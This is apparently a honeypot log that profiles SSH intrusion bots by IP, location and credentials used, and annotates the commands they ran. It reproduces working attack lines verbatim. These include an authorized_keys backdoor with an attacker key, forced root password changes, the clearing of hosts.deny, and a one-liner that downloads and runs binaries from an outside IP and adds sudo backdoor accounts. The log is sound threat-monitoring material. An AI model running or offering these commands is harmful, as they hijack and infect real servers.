$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ // SSH key persistence
$ cat /proc/cpuinfo | grep name | wc -l // CPU profiling
$ echo -e "Core(TM)\nljKj0tKJuCBK\nljKj0tKJuCBK"|passwd|bash
$ Enter new UNIX password:
$ echo "Core(TM)\nljKj0tKJuCBK\nljKj0tKJuCBK\n"|passwd
$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}' // CPU profiling
$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}'
$ ls -lh $(which ls)
$ which ls
$ crontab -l // persistence setup
$ w // logged-in users check
$ uname -m
$ cat /proc/cpuinfo | grep model | grep name | wc -l // CPU profiling
$ top // process monitoring
$ uname // OS identification
$ uname -a // OS/kernel identification
$ whoami // privilege check
$ lscpu | grep Model
$ df -h | head -n 2 | awk 'FNR == 2 {print $2;}'
🎭 rogue_root_40 (146.59.95.254) β€” Warsaw, Poland Β· 2 sessions Β· 39 cmds
2026-06-01 15:31 EDT Β· as cs2server/1234, root/Root123?
Ran uname 1x across 1 sessions β€” automated OS fingerprinting.
$ cd ~; chattr -ia .ssh; lockr -ia .ssh Γ—2 // file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ Γ—2 // SSH key persistence
$ cat /proc/cpuinfo | grep name | wc -l Γ—2 // CPU profiling
$ echo "root:EBphmMuFWPas"|chpasswd|bash
$ rm -rf /tmp/secure.sh; rm -rf /tmp/auth.sh; pkill -9 secure.sh; pkill -9 auth.sh; echo > /etc/hosts.deny; pkill -9 sleep; // execute from /tmp
$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}' Γ—2 // CPU profiling
$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}' Γ—2
$ ls -lh $(which ls) Γ—2
$ which ls Γ—2
$ crontab -l Γ—2 // persistence setup
$ w Γ—2 // logged-in users check
$ uname -m Γ—2
$ cat /proc/cpuinfo | grep model | grep name | wc -l Γ—2 // CPU profiling
$ top Γ—2 // process monitoring
$ uname Γ—2 // OS identification
$ uname -a Γ—2 // OS/kernel identification
$ whoami Γ—2 // privilege check
$ lscpu | grep Model Γ—2
$ df -h | head -n 2 | awk 'FNR == 2 {print $2;}' Γ—2
$ echo -e "1234\nPUbrXql2r3F9\nPUbrXql2r3F9"|passwd|bash
$ Enter new UNIX password:
$ echo "1234\nPUbrXql2r3F9\nPUbrXql2r3F9\n"|passwd
🎭 blitz_root_6 (62.171.152.82) β€” Frankfurt am Main, Germany Β· 2 sessions Β· 39 cmds
2026-06-01 15:34 EDT Β· as cs2server/1234, root/Root123?
Ran uname 1x across 1 sessions β€” automated OS fingerprinting.
$ cd ~; chattr -ia .ssh; lockr -ia .ssh Γ—2 // file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ Γ—2 // SSH key persistence
$ cat /proc/cpuinfo | grep name | wc -l Γ—2 // CPU profiling
$ echo -e "1234\n6crlZ8cnqbhU\n6crlZ8cnqbhU"|passwd|bash
$ Enter new UNIX password:
$ echo "1234\n6crlZ8cnqbhU\n6crlZ8cnqbhU\n"|passwd
$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}' Γ—2 // CPU profiling
$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}' Γ—2
$ ls -lh $(which ls) Γ—2
$ which ls Γ—2
$ crontab -l Γ—2 // persistence setup
$ w Γ—2 // logged-in users check
$ uname -m Γ—2
$ cat /proc/cpuinfo | grep model | grep name | wc -l Γ—2 // CPU profiling
$ top Γ—2 // process monitoring
$ uname Γ—2 // OS identification
$ uname -a Γ—2 // OS/kernel identification
$ whoami Γ—2 // privilege check
$ lscpu | grep Model Γ—2
$ df -h | head -n 2 | awk 'FNR == 2 {print $2;}' Γ—2
$ echo "root:ownPcy0PFgzX"|chpasswd|bash
$ rm -rf /tmp/secure.sh; rm -rf /tmp/auth.sh; pkill -9 secure.sh; pkill -9 auth.sh; echo > /etc/hosts.deny; pkill -9 sleep; // execute from /tmp
🎭 chai_root_5 (52.140.76.154) β€” Pune, India Β· 2 sessions Β· 39 cmds
2026-05-07 11:24 EDT Β· as admin/justb0w, root/Jr12345678
Ran uname 1x across 1 sessions β€” automated OS fingerprinting.
$ cd ~; chattr -ia .ssh; lockr -ia .ssh Γ—2 // file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ Γ—2 // SSH key persistence
$ cat /proc/cpuinfo | grep name | wc -l Γ—2 // CPU profiling
$ echo "root:I3OR1zA8IfdS"|chpasswd|bash
$ rm -rf /tmp/secure.sh; rm -rf /tmp/auth.sh; pkill -9 secure.sh; pkill -9 auth.sh; echo > /etc/hosts.deny; pkill -9 sleep; // execute from /tmp
$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}' Γ—2 // CPU profiling
$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}' Γ—2
$ ls -lh $(which ls) Γ—2
$ which ls Γ—2
$ crontab -l Γ—2 // persistence setup
$ w Γ—2 // logged-in users check
$ uname -m Γ—2
$ cat /proc/cpuinfo | grep model | grep name | wc -l Γ—2 // CPU profiling
$ top Γ—2 // process monitoring
$ uname Γ—2 // OS identification
$ uname -a Γ—2 // OS/kernel identification
$ whoami Γ—2 // privilege check
$ lscpu | grep Model Γ—2
$ df -h | head -n 2 | awk 'FNR == 2 {print $2;}' Γ—2
$ echo -e "justb0w\ny6O50hrQLwRE\ny6O50hrQLwRE"|passwd|bash
$ Enter new UNIX password:
$ echo "justb0w\ny6O50hrQLwRE\ny6O50hrQLwRE\n"|passwd
🎭 tiger_root_9 (103.89.136.111) β€” Noida, India Β· 1 session Β· 19 cmds
2026-06-01 15:32 EDT Β· as root/Jr12345678
Ran uname 1x across 1 sessions β€” automated OS fingerprinting.
$ cd ~; chattr -ia .ssh; lockr -ia .ssh // file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ // SSH key persistence
$ cat /proc/cpuinfo | grep name | wc -l // CPU profiling
$ echo "root:OiqX6C81alNm"|chpasswd|bash
$ rm -rf /tmp/secure.sh; rm -rf /tmp/auth.sh; pkill -9 secure.sh; pkill -9 auth.sh; echo > /etc/hosts.deny; pkill -9 sleep; // execute from /tmp
$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}' // CPU profiling
$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}'
$ ls -lh $(which ls)
$ which ls
$ crontab -l // persistence setup
$ w // logged-in users check
$ uname -m
$ cat /proc/cpuinfo | grep model | grep name | wc -l // CPU profiling
$ top // process monitoring
$ uname // OS identification
$ uname -a // OS/kernel identification
$ whoami // privilege check
$ lscpu | grep Model
$ df -h | head -n 2 | awk 'FNR == 2 {print $2;}'
🎭 phantom_root_37 (143.198.221.127) β€” Singapore, Singapore Β· 1 session Β· 20 cmds
2026-06-01 15:31 EDT Β· as cs2server/1234
Ran uname 1x across 1 sessions β€” automated OS fingerprinting.
$ cd ~; chattr -ia .ssh; lockr -ia .ssh // file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ // SSH key persistence
$ cat /proc/cpuinfo | grep name | wc -l // CPU profiling
$ echo -e "1234\nvSwr00fa44eN\nvSwr00fa44eN"|passwd|bash
$ Enter new UNIX password:
$ echo "1234\nvSwr00fa44eN\nvSwr00fa44eN\n"|passwd
$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}' // CPU profiling
$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}'
$ ls -lh $(which ls)
$ which ls
$ crontab -l // persistence setup
$ w // logged-in users check
$ uname -m
$ cat /proc/cpuinfo | grep model | grep name | wc -l // CPU profiling
$ top // process monitoring
$ uname // OS identification
$ uname -a // OS/kernel identification
$ whoami // privilege check
$ lscpu | grep Model
$ df -h | head -n 2 | awk 'FNR == 2 {print $2;}'
🎭 carnival_root_5 (152.67.46.203) β€” SΓ£o Paulo, Brazil Β· 1 session Β· 19 cmds
2026-06-01 15:31 EDT Β· as root/Pp123456!
Ran uname 1x across 1 sessions β€” automated OS fingerprinting.
$ cd ~; chattr -ia .ssh; lockr -ia .ssh // file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ // SSH key persistence
$ cat /proc/cpuinfo | grep name | wc -l // CPU profiling
$ echo "root:5mHb0Bg8UiAS"|chpasswd|bash
$ rm -rf /tmp/secure.sh; rm -rf /tmp/auth.sh; pkill -9 secure.sh; pkill -9 auth.sh; echo > /etc/hosts.deny; pkill -9 sleep; // execute from /tmp
$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}' // CPU profiling
$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}'
$ ls -lh $(which ls)
$ which ls
$ crontab -l // persistence setup
$ w // logged-in users check
$ uname -m
$ cat /proc/cpuinfo | grep model | grep name | wc -l // CPU profiling
$ top // process monitoring
$ uname // OS identification
$ uname -a // OS/kernel identification
$ whoami // privilege check
$ lscpu | grep Model
$ df -h | head -n 2 | awk 'FNR == 2 {print $2;}'
🎭 specter_root (66.181.171.136) β€” Ulan Bator, Mongolia Β· 6 sessions Β· 6 cmds
2026-06-01 14:10 EDT Β· as ubnt/ubnt, wang/wang123
Ran uname 6x across 6 sessions β€” automated OS fingerprinting.
$ uname -s -v -n -r -m Γ—6
🎭 silk_root_4 (111.228.33.68) β€” Beijing, China Β· 8 sessions Β· 156 cmds
2026-05-27 21:16 EDT Β· as admin/fjbdfdjkdsfs541544, geo/geo, root/Li123456.
Ran uname 6x across 6 sessions β€” automated OS fingerprinting.
$ cd ~; chattr -ia .ssh; lockr -ia .ssh Γ—8 // file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ Γ—8 // SSH key persistence
$ cat /proc/cpuinfo | grep name | wc -l Γ—8 // CPU profiling
$ echo "root:fd3Zc12mHiBL"|chpasswd|bash
$ rm -rf /tmp/secure.sh; rm -rf /tmp/auth.sh; pkill -9 secure.sh; pkill -9 auth.sh; echo > /etc/hosts.deny; pkill -9 sleep; Γ—4 // execute from /tmp
$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}' Γ—8 // CPU profiling
$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}' Γ—8
$ ls -lh $(which ls) Γ—8
$ which ls Γ—8
$ crontab -l Γ—8 // persistence setup
$ w Γ—8 // logged-in users check
$ uname -m Γ—8
$ cat /proc/cpuinfo | grep model | grep name | wc -l Γ—8 // CPU profiling
$ top Γ—8 // process monitoring
$ uname Γ—8 // OS identification
$ uname -a Γ—8 // OS/kernel identification
$ whoami Γ—8 // privilege check
$ lscpu | grep Model Γ—8
$ df -h | head -n 2 | awk 'FNR == 2 {print $2;}' Γ—8
$ echo -e "geo\nD38nEskHmA6E\nD38nEskHmA6E"|passwd|bash
$ Enter new UNIX password: Γ—4
$ echo "geo\nD38nEskHmA6E\nD38nEskHmA6E\n"|passwd
$ echo -e "123456\nhI64jKkf0SfR\nhI64jKkf0SfR"|passwd|bash
$ echo "123456\nhI64jKkf0SfR\nhI64jKkf0SfR\n"|passwd
$ echo -e "fjbdfdjkdsfs541544\ns4n04LH3FNsL\ns4n04LH3FNsL"|passwd|bash
$ echo "fjbdfdjkdsfs541544\ns4n04LH3FNsL\ns4n04LH3FNsL\n"|passwd
$ echo "root:bQZrGLhf6WAQ"|chpasswd|bash
$ echo "root:AqaSMNZCsvvN"|chpasswd|bash
$ echo "root:QOhfv2j8VKg0"|chpasswd|bash
$ echo -e "1234!@#$\nIU1kTs6GMF4V\nIU1kTs6GMF4V"|passwd|bash
$ echo "1234!@#$\nIU1kTs6GMF4V\nIU1kTs6GMF4V\n"|passwd
🎭 frost_root_5 (109.194.108.203) β€” Moscow, Russia Β· 2 sessions Β· 38 cmds
2026-05-15 10:37 EDT Β· as root/Asd@1234, root/a12345678.
Ran uname 6x across 6 sessions β€” automated OS fingerprinting.
$ cd ~; chattr -ia .ssh; lockr -ia .ssh Γ—2 // file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ Γ—2 // SSH key persistence
$ cat /proc/cpuinfo | grep name | wc -l Γ—2 // CPU profiling
$ echo "root:b1mz1MRTwt3b"|chpasswd|bash
$ rm -rf /tmp/secure.sh; rm -rf /tmp/auth.sh; pkill -9 secure.sh; pkill -9 auth.sh; echo > /etc/hosts.deny; pkill -9 sleep; Γ—2 // execute from /tmp
$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}' Γ—2 // CPU profiling
$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}' Γ—2
$ ls -lh $(which ls) Γ—2
$ which ls Γ—2
$ crontab -l Γ—2 // persistence setup
$ w Γ—2 // logged-in users check
$ uname -m Γ—2
$ cat /proc/cpuinfo | grep model | grep name | wc -l Γ—2 // CPU profiling
$ top Γ—2 // process monitoring
$ uname Γ—2 // OS identification
$ uname -a Γ—2 // OS/kernel identification
$ whoami Γ—2 // privilege check
$ lscpu | grep Model Γ—2
$ df -h | head -n 2 | awk 'FNR == 2 {print $2;}' Γ—2
$ echo "root:ReFIVi6CE1yI"|chpasswd|bash
🎭 phantom_root_38 (43.155.40.91) β€” Hong Kong, Hong Kong Β· 1 session Β· 19 cmds
2026-06-01 13:44 EDT Β· as root/a12345678.
Ran uname 6x across 6 sessions β€” automated OS fingerprinting.
$ cd ~; chattr -ia .ssh; lockr -ia .ssh // file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ // SSH key persistence
$ cat /proc/cpuinfo | grep name | wc -l // CPU profiling
$ echo "root:rvSm2ZLZ0HZW"|chpasswd|bash
$ rm -rf /tmp/secure.sh; rm -rf /tmp/auth.sh; pkill -9 secure.sh; pkill -9 auth.sh; echo > /etc/hosts.deny; pkill -9 sleep; // execute from /tmp
$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}' // CPU profiling
$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}'
$ ls -lh $(which ls)
$ which ls
$ crontab -l // persistence setup
$ w // logged-in users check
$ uname -m
$ cat /proc/cpuinfo | grep model | grep name | wc -l // CPU profiling
$ top // process monitoring
$ uname // OS identification
$ uname -a // OS/kernel identification
$ whoami // privilege check
$ lscpu | grep Model
$ df -h | head -n 2 | awk 'FNR == 2 {print $2;}'
🎭 yankee_root_19 (34.48.112.96) β€” Washington, United States Β· 1 session Β· 23 cmds
2026-06-01 13:37 EDT Β· as ubnt/ubnt
Ran uname 6x across 6 sessions β€” automated OS fingerprinting.
$ echo 'ubnt' | sudo -S sh -c 'cd /tmp; ulimit -n 1020000; rm -rf meow*; wget http://34.181.210.37/meow; curl -O http://34.181.210.37/meow; chmod 777 meow; ./meow; wget http://34.181.210.37/meowarm64; curl -O http://34.181.210.37/meowarm64; chmod 777 meowarm64; ./meowarm64; echo $(whoami):modzmodz | chpasswd; useradd -m -s /bin/bash admin1; echo admin1:modzmodz | chpasswd; usermod -aG sudo admin1; useradd -m -s /bin/bash user1; echo user1:modzmodz | chpasswd; echo -n $(whoami):ubnt > /tmp/mew' 2>/dev/null || (cd /tmp; ulimit -n 1020000; rm -rf meow*; wget http://34.181.210.37/meow; curl -O http://34.181.210.37/meow; chmod 777 meow; ./meow; wget http://34.181.210.37/meowarm64; curl -O http://34.181.210.37/meowarm64; chmod 777 meowarm64; ./meowarm64; echo $(whoami):modzmodz | chpasswd; useradd -m -s /bin/bash admin1; echo admin1:modzmodz | chpasswd; usermod -aG sudo admin1; useradd -m -s /bin/bash user1; echo user1:modzmodz | chpasswd; echo -n $(whoami):ubnt > /tmp/mew) // payload download from C2
$ whoami Γ—4 // privilege check
$ cd /tmp
$ ulimit -n 1020000
$ rm -rf meow*
$ wget http://34.181.210.37/meow // payload download from C2
$ curl -O http://34.181.210.37/meow // payload download
$ chmod 777 meow // make executable (world)
$ ./meow // execute payload
$ wget http://34.181.210.37/meowarm64 // payload download from C2
$ curl -O http://34.181.210.37/meowarm64 // payload download
$ chmod 777 meowarm64 // make executable (world)
$ ./meowarm64 // execute payload
$ echo $(whoami):modzmodz | chpasswd
$ useradd -m -s /bin/bash admin1 // create backdoor account
$ echo admin1:modzmodz | chpasswd
$ usermod -aG sudo admin1
$ useradd -m -s /bin/bash user1 // create backdoor account
$ echo user1:modzmodz | chpasswd
$ echo -n $(whoami):ubnt > /tmp/mew // execute from /tmp
🎭 star_2 (34.181.201.117) β€” Washington, United States Β· 1 session Β· 23 cmds
2026-06-01 13:21 EDT Β· as ubnt/ubnt
Ran uname 6x across 6 sessions β€” automated OS fingerprinting.
$ echo 'ubnt' | sudo -S sh -c 'cd /tmp; ulimit -n 1020000; rm -rf meow*; wget http://34.181.210.37/meow; curl -O http://34.181.210.37/meow; chmod 777 meow; ./meow; wget http://34.181.210.37/meowarm64; curl -O http://34.181.210.37/meowarm64; chmod 777 meowarm64; ./meowarm64; echo $(whoami):modzmodz | chpasswd; useradd -m -s /bin/bash admin1; echo admin1:modzmodz | chpasswd; usermod -aG sudo admin1; useradd -m -s /bin/bash user1; echo user1:modzmodz | chpasswd; echo -n $(whoami):ubnt > /tmp/mew' 2>/dev/null || (cd /tmp; ulimit -n 1020000; rm -rf meow*; wget http://34.181.210.37/meow; curl -O http://34.181.210.37/meow; chmod 777 meow; ./meow; wget http://34.181.210.37/meowarm64; curl -O http://34.181.210.37/meowarm64; chmod 777 meowarm64; ./meowarm64; echo $(whoami):modzmodz | chpasswd; useradd -m -s /bin/bash admin1; echo admin1:modzmodz | chpasswd; usermod -aG sudo admin1; useradd -m -s /bin/bash user1; echo user1:modzmodz | chpasswd; echo -n $(whoami):ubnt > /tmp/mew) // payload download from C2
$ whoami Γ—4 // privilege check
$ cd /tmp
$ ulimit -n 1020000
$ rm -rf meow*
$ wget http://34.181.210.37/meow // payload download from C2
$ curl -O http://34.181.210.37/meow // payload download
$ chmod 777 meow // make executable (world)
$ ./meow // execute payload
$ wget http://34.181.210.37/meowarm64 // payload download from C2
$ curl -O http://34.181.210.37/meowarm64 // payload download
$ chmod 777 meowarm64 // make executable (world)
$ ./meowarm64 // execute payload
$ echo $(whoami):modzmodz | chpasswd
$ useradd -m -s /bin/bash admin1 // create backdoor account
$ echo admin1:modzmodz | chpasswd
$ usermod -aG sudo admin1
$ useradd -m -s /bin/bash user1 // create backdoor account
$ echo user1:modzmodz | chpasswd
$ echo -n $(whoami):ubnt > /tmp/mew // execute from /tmp
🎭 shadow_root_36 (45.78.206.111) β€” Singapore, Singapore Β· 2 sessions Β· 39 cmds
2026-05-05 04:59 EDT Β· as ali/asdf1234, root/Linewell@2026
Ran uname 6x across 6 sessions β€” automated OS fingerprinting.
$ cd ~; chattr -ia .ssh; lockr -ia .ssh Γ—2 // file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ Γ—2 // SSH key persistence
$ cat /proc/cpuinfo | grep name | wc -l Γ—2 // CPU profiling
$ echo "root:C5tDGD0DtmxP"|chpasswd|bash
$ rm -rf /tmp/secure.sh; rm -rf /tmp/auth.sh; pkill -9 secure.sh; pkill -9 auth.sh; echo > /etc/hosts.deny; pkill -9 sleep; // execute from /tmp
$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}' Γ—2 // CPU profiling
$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}' Γ—2
$ ls -lh $(which ls) Γ—2
$ which ls Γ—2
$ crontab -l Γ—2 // persistence setup
$ w Γ—2 // logged-in users check
$ uname -m Γ—2
$ cat /proc/cpuinfo | grep model | grep name | wc -l Γ—2 // CPU profiling
$ top Γ—2 // process monitoring
$ uname Γ—2 // OS identification
$ uname -a Γ—2 // OS/kernel identification
$ whoami Γ—2 // privilege check
$ lscpu | grep Model Γ—2
$ df -h | head -n 2 | awk 'FNR == 2 {print $2;}' Γ—2
$ echo -e "asdf1234\nXl457mjE8zKX\nXl457mjE8zKX"|passwd|bash
$ Enter new UNIX password:
$ echo "asdf1234\nXl457mjE8zKX\nXl457mjE8zKX\n"|passwd
🎭 jade_root_9 (139.170.141.76) β€” Xining, China Β· 1 session Β· 1 cmd
2026-06-01 12:12 EDT Β· as root/---fuck_you----
Ran uname 1x across 1 sessions β€” automated OS fingerprinting.
$ uname -s -m
🎭 maple_root_2 (144.217.13.134) β€” Beauharnois, Canada Β· 1 session Β· 19 cmds
2026-06-01 11:58 EDT Β· as root/Linewell@2026
Ran uname 1x across 1 sessions β€” automated OS fingerprinting.
